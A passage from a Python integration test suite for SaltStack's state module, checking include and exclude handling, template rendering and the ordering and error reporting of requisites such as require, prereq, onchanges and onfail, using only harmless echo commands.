except Exception:
if os.path.exists(testfile):
shutil.copy(testfile, testfile + '.bak')
raise
finally:
if os.path.exists(testfile):
os.unlink(testfile)
def test_include(self):
tempdir = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, tempdir, ignore_errors=True)
pillar = {}
for path in ('include-test', 'to-include-test', 'exclude-test'):
pillar[path] = os.path.join(tempdir, path)
ret = self.run_function('state.sls', mods='include-test', pillar=pillar)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(pillar['include-test']))
self.assertTrue(os.path.isfile(pillar['to-include-test']))
self.assertFalse(os.path.isfile(pillar['exclude-test']))
def test_exclude(self):
tempdir = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, tempdir, ignore_errors=True)
pillar = {}
for path in ('include-test', 'exclude-test', 'to-include-test'):
pillar[path] = os.path.join(tempdir, path)
ret = self.run_function('state.sls', mods='exclude-test', pillar=pillar)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(pillar['include-test']))
self.assertTrue(os.path.isfile(pillar['exclude-test']))
self.assertFalse(os.path.isfile(pillar['to-include-test']))
@skipIf(salt.utils.path.which_bin(KNOWN_BINARY_NAMES) is None, 'virtualenv not installed')
def test_issue_2068_template_str(self):
venv_dir = os.path.join(
TMP, 'issue-2068-template-str'
)
try:
ret = self.run_function(
'state.sls', mods='issue-2068-template-str-no-dot',
timeout=120
)
self.assertSaltTrueReturn(ret)
finally:
if os.path.isdir(venv_dir):
shutil.rmtree(venv_dir)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str-no-dot.sls'
)
with salt.utils.files.fopen(template_path, 'r') as fp_:
template = salt.utils.stringutils.to_unicode(fp_.read())
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now the problematic #2068 including dot's
ret = self.run_function(
'state.sls', mods='issue-2068-template-str', timeout=120
)
self.assertSaltTrueReturn(ret)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str.sls'
)
with salt.utils.files.fopen(template_path, 'r') as fp_:
template = salt.utils.stringutils.to_unicode(fp_.read())
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
def test_template_invalid_items(self):
TEMPLATE = textwrap.dedent('''\
{0}:
- issue-2068-template-str
/tmp/test-template-invalid-items:
file:
- managed
- source: salt://testfile
''')
for item in ('include', 'exclude', 'extends'):
ret = self.run_function(
'state.template_str', [TEMPLATE.format(item)]
)
self.assertTrue(isinstance(ret, list))
self.assertNotEqual(ret, [])
self.assertEqual(
['The \'{0}\' declaration found on \'<template-str>\' is '
'invalid when rendering single templates'.format(item)],
ret
)
def test_pydsl(self):
'''
Test the basics of the pydsl
'''
ret = self.run_function('state.sls', mods='pydsl-1')
self.assertSaltTrueReturn(ret)
def test_issues_7905_and_8174_sls_syntax_error(self):
'''
Call sls file with yaml syntax error.
        Ensure these errors are detected and presented to the user without
stack traces.
'''
ret = self.run_function('state.sls', mods='syntax.badlist')
self.assertEqual(ret, [
'State \'A\' in SLS \'syntax.badlist\' is not formed as a list'
])
ret = self.run_function('state.sls', mods='syntax.badlist2')
self.assertEqual(ret, [
'State \'C\' in SLS \'syntax.badlist2\' is not formed as a list'
])
def test_requisites_mixed_require_prereq_use(self):
'''
Call sls file containing several requisites.
'''
expected_simple_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True}
}
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B third" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True}
}
expected_req_use_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 4,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 5,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 2,
'comment': 'Command "echo E" run',
'result': True,
'changes': True},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 3,
'comment': 'Command "echo F" run',
'result': True,
'changes': True}
}
ret = self.run_function('state.sls', mods='requisites.mixed_simple')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_simple_result, result)
# test Traceback recursion prereq+require #8785
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error2')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v2
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error3')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v3
# TODO: this is actually failing badly, and expected result is maybe not a recursion
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error4')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
        # undetected infinite loops prevent this test from running...
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.mixed_complex1')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result, result)
def test_watch_in(self):
'''
test watch_in requisite when there is a success
'''
ret = self.run_function('state.sls', mods='requisites.watch_in')
changes = 'test_|-return_changes_|-return_changes_|-succeed_with_changes'
watch = 'test_|-watch_states_|-watch_states_|-succeed_without_changes'
self.assertEqual(ret[changes]['__run_num__'], 0)
self.assertEqual(ret[watch]['__run_num__'], 2)
self.assertEqual('Watch statement fired.', ret[watch]['comment'])
self.assertEqual('Something pretended to change',
ret[changes]['changes']['testing']['new'])
def test_watch_in_failure(self):
'''
test watch_in requisite when there is a failure
'''
ret = self.run_function('state.sls', mods='requisites.watch_in_failure')
fail = 'test_|-return_changes_|-return_changes_|-fail_with_changes'
watch = 'test_|-watch_states_|-watch_states_|-succeed_without_changes'
self.assertEqual(False, ret[fail]['result'])
self.assertEqual('One or more requisite failed: requisites.watch_in_failure.return_changes',
ret[watch]['comment'])
def normalize_ret(self, ret):
'''
Normalize the return to the format that we'll use for result checking
'''
result = {}
for item, descr in six.iteritems(ret):
result[item] = {
'__run_num__': descr['__run_num__'],
'comment': descr['comment'],
'result': descr['result'],
                'changes': descr['changes'] != {}  # whether there were any changes
}
return result
def test_requisites_require_ordering_and_errors(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C third" run',
'result': True,
'changes': True,
},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True,
},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True,
},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 5,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' foobar: A\n',
'result': False,
'changes': False,
},
'cmd_|-G_|-echo G_|-run': {
'__run_num__': 6,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
},
'cmd_|-H_|-echo H_|-run': {
'__run_num__': 7,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
}
}
ret = self.run_function('state.sls', mods='requisites.require')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
ret = self.run_function('state.sls', mods='requisites.require_error1')
self.assertEqual(ret, [
"Cannot extend ID 'W' in 'base:requisites.require_error1'. It is not part of the high state.\nThis is likely due to a missing include statement or an incorrectly typed ID.\nEnsure that a state with an ID of 'W' is available\nin environment 'base' and to SLS 'requisites.require_error1'"
])
# issue #8235
# FIXME: Why is require enforcing list syntax while require_in does not?
        # And why prevent it?
# Currently this state fails, should return C/B/A
result = {}
ret = self.run_function('state.sls', mods='requisites.require_simple_nolist')
self.assertEqual(ret, [
'The require statement in state \'B\' in SLS '
+ '\'requisites.require_simple_nolist\' needs to be formed as a list'
])
# commented until a fix is made for issue #8772
# TODO: this test actually fails
#ret = self.run_function('state.sls', mods='requisites.require_error2')
#self.assertEqual(ret, [
# 'Cannot extend state foobar for ID A in "base:requisites.require_error2".'
# + ' It is not part of the high state.'
#])
ret = self.run_function('state.sls', mods='requisites.require_recursion_error1')
self.assertEqual(
ret,
['A recursive requisite was found, SLS "requisites.require_recursion_error1" ID "B" ID "A"']
)
def test_requisites_require_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 3,
'comment': 'Command "echo A" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-/bin/false_|-run': {
'__run_num__': 1,
'comment': 'Command "/bin/false" run',
'result': False,
'changes': True,
},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 2,
'comment': 'Command "echo D" run',
'result': True,
'changes': True,
},
}
ret = self.run_function('state.sls', mods='requisites.require_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_require_any_fail(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
ret = self.run_function('state.sls', mods='requisites.require_any_fail')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertIn('One or more requisite failed',
result['cmd_|-D_|-echo D_|-run']['comment'])
def test_requisites_watch_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
if salt.utils.platform.is_windows():
cmd_true = 'exit'
cmd_false = 'exit /B 1'
else:
cmd_true = 'true'
cmd_false = 'false'
expected_result = {
'cmd_|-A_|-{0}_|-wait'.format(cmd_true): {
'__run_num__': 4,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-B_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 0,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-C_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 1,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
'cmd_|-D_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 2,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-E_|-{0}_|-wait'.format(cmd_true): {
'__run_num__': 9,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-F_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 5,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-G_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 6,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
'cmd_|-H_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 7,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
}
ret = self.run_function('state.sls', mods='requisites.watch_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_watch_any_fail(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
ret = self.run_function('state.sls', mods='requisites.watch_any_fail')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertIn('One or more requisite failed',
result['cmd_|-A_|-true_|-wait']['comment'])
def test_requisites_onchanges_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-another_changing_state_|-echo "Changed!"_|-run': {
'__run_num__': 1,
'changes': True,
'comment': 'Command "echo "Changed!"" run',
'result': True
},
'cmd_|-changing_state_|-echo "Changed!"_|-run': {
'__run_num__': 0,
'changes': True,
'comment': 'Command "echo "Changed!"" run',
'result': True
},
'cmd_|-test_one_changing_states_|-echo "Success!"_|-run': {
'__run_num__': 4,
'changes': True,
'comment': 'Command "echo "Success!"" run',
'result': True
},
'cmd_|-test_two_non_changing_states_|-echo "Should not run"_|-run': {
'__run_num__': 5,
'changes': False,
'comment': 'State was not run because none of the onchanges reqs changed',
'result': True
},
'pip_|-another_non_changing_state_|-mock_|-installed': {
'__run_num__': 3,
'changes': False,
'comment': 'Python package mock was already installed\nAll specified packages are already installed',
'result': True
},
'pip_|-non_changing_state_|-mock_|-installed': {
'__run_num__': 2,
'changes': False,
'comment': 'Python package mock was already installed\nAll specified packages are already installed',
'result': True
}
}
ret = self.run_function('state.sls', mods='requisites.onchanges_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_onfail_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-a_|-exit 0_|-run': {
'__run_num__': 0,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-b_|-exit 1_|-run': {
'__run_num__': 1,
'changes': True,
'comment': 'Command "exit 1" run',
'result': False
},
'cmd_|-c_|-exit 0_|-run': {
'__run_num__': 2,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-d_|-echo itworked_|-run': {
'__run_num__': 3,
'changes': True,
'comment': 'Command "echo itworked" run',
'result': True},
'cmd_|-e_|-exit 0_|-run': {
'__run_num__': 4,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-f_|-exit 0_|-run': {
'__run_num__': 5,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-g_|-exit 0_|-run': {
'__run_num__': 6,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-h_|-echo itworked_|-run': {
'__run_num__': 7,
'changes': False,
'comment': 'State was not run because onfail req did not change',
'result': True
}
}
ret = self.run_function('state.sls', mods='requisites.onfail_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_full_sls(self):
'''
        Test the sls special command in requisites
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.fullsls_require')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result, result)
# issue #8233: traceback on prereq sls
# TODO: not done
#ret = self.run_function('state.sls', mods='requisites.fullsls_prereq')
#self.assertEqual(['sls command can only be used with require requisite'], ret)
def test_requisites_require_no_state_module(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C third" run',
'result': True,
'changes': True,
},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True,
},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True,
},
'cmd_|-G_|-echo G_|-run': {
'__run_num__': 5,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' id: Z\n',
'result': False,
'changes': False,
},
'cmd_|-H_|-echo H_|-run': {
'__run_num__': 6,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' id: Z\n',
'result': False,
'changes': False,
}
}
ret = self.run_function('state.sls', mods='requisites.require_no_state_module')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_prereq_simple_ordering_and_errors(self):
'''
Call sls file containing several prereq_in and prereq.
Ensure that some of them are failing and that the order is right.
'''
expected_result_simple = {
'cmd_|-A_|-echo A third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A third" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-I_|-echo I_|-run': {
'__run_num__': 3,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False},
'cmd_|-J_|-echo J_|-run': {
'__run_num__': 4,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n',
'result': False,
'changes': False}
}
expected_result_simple_no_state_module = {
'cmd_|-A_|-echo A third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A third" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-I_|-echo I_|-run': {
'__run_num__': 3,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' id: Z\n',
'result': False,
'changes': False}
}
expected_result_simple2 = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 3,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 4,
'comment': 'Command "echo E" run',
'result': True,
'changes': True}
}
expected_result_simple3 = {
'cmd_|-A_|-echo A first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo A first" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-wait': {
'__run_num__': 2,
'comment': '',
'result': True,
'changes': False,
}
}
expected_result_complex = {
'cmd_|-A_|-echo A fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo A fourth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo D third" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.prereq_simple')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result_simple, result)
# same test, but not using lists in yaml syntax
# TODO: issue #8235, prereq ignored when not used in list syntax
# Currently fails badly with :
# TypeError encountered executing state.sls: string indices must be integers, not str.
#expected_result_simple.pop('cmd_|-I_|-echo I_|-run')
#expected_result_simple.pop('cmd_|-J_|-echo J_|-run')
#ret = self.run_function('state.sls', mods='requisites.prereq_simple_nolist')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result_simple, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple2')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple2, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple3')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple3, result)
#ret = self.run_function('state.sls', mods='requisites.prereq_error_nolist')
#self.assertEqual(
# ret,
# ['Cannot extend ID Z in "base:requisites.prereq_error_nolist".'
# + ' It is not part of the high state.']
#)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error1')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error2')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: C\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_complex')
result = self.normalize_ret(ret)
self.assertEqual(expected_result_complex, result)
# issue #8210 : prereq recursion undetected
# TODO: this test fails
#ret = self.run_function('state.sls', mods='requisites.prereq_recursion_error')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_recursion_error" ID "B" ID "A"']
#)
ret = self.run_function('state.sls', mods='requisites.prereq_simple_no_state_module')
result = self.normalize_ret(ret)
self.assertEqual(expected_result_simple_no_state_module, result)
def test_infinite_recursion_sls_prereq(self):
ret = self.run_function('state.sls', mods='requisites.prereq_sls_infinite_recursion')
self.assertSaltTrueReturn(ret)
def test_requisites_use(self):
'''
Call sls file containing several use_in and use.
'''
# TODO issue #8235 & #8774 some examples are still commented in the test file
ret = self.run_function('state.sls', mods='requisites.use')
self.assertReturnNonEmptySaltType(ret)
for item, descr in six.iteritems(ret):
self.assertEqual(descr['comment'], 'onlyif condition is false')
# TODO: issue #8802 : use recursions undetected
# issue is closed as use does not actually inherit requisites
        # if chain-use is added after #8774 resolution these tests might become useful
#ret = self.run_function('state.sls', mods='requisites.use_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "B" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_recursion2')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion2"'
# + ' ID "C" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_auto_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "A" ID "A"'
#])
def test_requisites_use_no_state_module(self):
'''
Call sls file containing several use_in and use.
'''
ret = self.run_function('state.sls', mods='requisites.use_no_state_module')
self.assertReturnNonEmptySaltType(ret)
for item, descr in six.iteritems(ret):
self.assertEqual(descr['comment'], 'onlyif condition is false')
def test_get_file_from_env_in_top_match(self):
tgt = os.path.join(TMP, 'prod-cheese-file')
try:
ret = self.run_function(
'state.highstate', minion_tgt='sub_minion'
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(tgt))
with salt.utils.files.fopen(tgt, 'r') as cheese:
data = salt.utils.stringutils.to_unicode(cheese.read())
self.assertIn('Gromit', data)
self.assertIn('Comte', data)
finally:
if os.path.islink(tgt):
os.unlink(tgt)
# onchanges tests
def test_onchanges_requisite(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple')
# First, test the result of the state run when changes are expected to happen
test_data = state_run['cmd_|-test_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_non_changing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_multiple(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls',
mods='requisites.onchanges_multiple')
# First, test the result of the state run when two changes are expected to happen
test_data = state_run['cmd_|-test_two_changing_states_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when two changes are not expected to happen
test_data = state_run['cmd_|-test_two_non_changing_states_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
# Finally, test the result of the state run when only one of the onchanges requisites changes.
test_data = state_run['cmd_|-test_one_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
def test_onchanges_in_requisite(self):
'''
Tests a simple state using the onchanges_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_in_simple')
# First, test the result of the state run of when changes are expected to happen
test_data = state_run['cmd_|-test_changes_expected_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_changes_not_expected_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_no_state_module(self):
'''
Tests a simple state using the onchanges requisite without state modules
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple_no_state_module')
test_data = state_run['cmd_|-test_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_with_duration(self):
'''
Tests a simple state using the onchanges requisite
the state will not run but results will include duration
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple')
# Then, test the result of the state run when changes are not expected to happen
# and ensure duration is included in the results
test_data = state_run['cmd_|-test_non_changing_state_|-echo "Should not run"_|-run']
self.assertIn('duration', test_data)
# onfail tests
def test_onfail_requisite(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_multiple_onfail_requisite(self):
'''
test to ensure state is run even if only one
of the onfails fails. This is a test for the issue:
https://github.com/saltstack/salt/issues/22370
'''
state_run = self.run_function('state.sls',
mods='requisites.onfail_multiple',
timeout=self.TIMEOUT)
retcode = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
stdout = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['stdout']
self.assertEqual(stdout, 'itworked')
def test_onfail_in_requisite(self):
'''
Tests a simple state using the onfail_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_in_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_onfail_requisite_no_state_module(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
